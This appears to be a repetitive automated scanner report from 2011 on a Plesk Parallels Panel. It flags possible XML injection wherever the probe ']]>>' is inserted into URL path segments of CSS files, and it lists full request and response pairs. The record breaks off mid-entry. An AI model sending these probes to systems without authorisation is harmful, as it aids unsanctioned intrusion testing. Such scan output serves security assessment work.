GET /skins/default/plesk/css/main]]>>/double-list-control.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:13 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk/css/main/double-list-control.css]]>> HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:16 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/main/layout.css
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins]]>>/default/plesk/css/main/layout.css?2 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:18 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/main/layout.css
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default]]>>/plesk/css/main/layout.css?2 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:20 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/main/layout.css
Issue detail
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk]]>>/css/main/layout.css?2 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:22 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/main/layout.css
Issue detail
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk/css]]>>/main/layout.css?2 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:24 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/main/layout.css
Issue detail
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk/css/main]]>>/layout.css?2 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:26 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/main/layout.css
Issue detail
The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk/css/main/layout.css]]>>?2 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:28 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/main/tabs.css
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins]]>>/default/plesk/css/main/tabs.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:06 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/main/tabs.css
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default]]>>/plesk/css/main/tabs.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:08 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/main/tabs.css
Issue detail
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk]]>>/css/main/tabs.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:09 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/main/tabs.css
Issue detail
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk/css]]>>/main/tabs.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:11 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/main/tabs.css
Issue detail
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk/css/main]]>>/tabs.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:13 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/main/tabs.css
Issue detail
The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk/css/main/tabs.css]]>> HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:16 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/top/custom.css
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins]]>>/default/plesk/css/top/custom.css?2 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:04 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/top/custom.css
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default]]>>/plesk/css/top/custom.css?2 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:06 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/top/custom.css
Issue detail
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk]]>>/css/top/custom.css?2 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:08 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/top/custom.css
Issue detail
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk/css]]>>/top/custom.css?2 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:10 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/top/custom.css
Issue detail
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk/css/top]]>>/custom.css?2 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:12 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/top/custom.css
Issue detail
The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/plesk/css/top/custom.css]]>>?2 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:14 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/plesk/css/top/layout.css
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
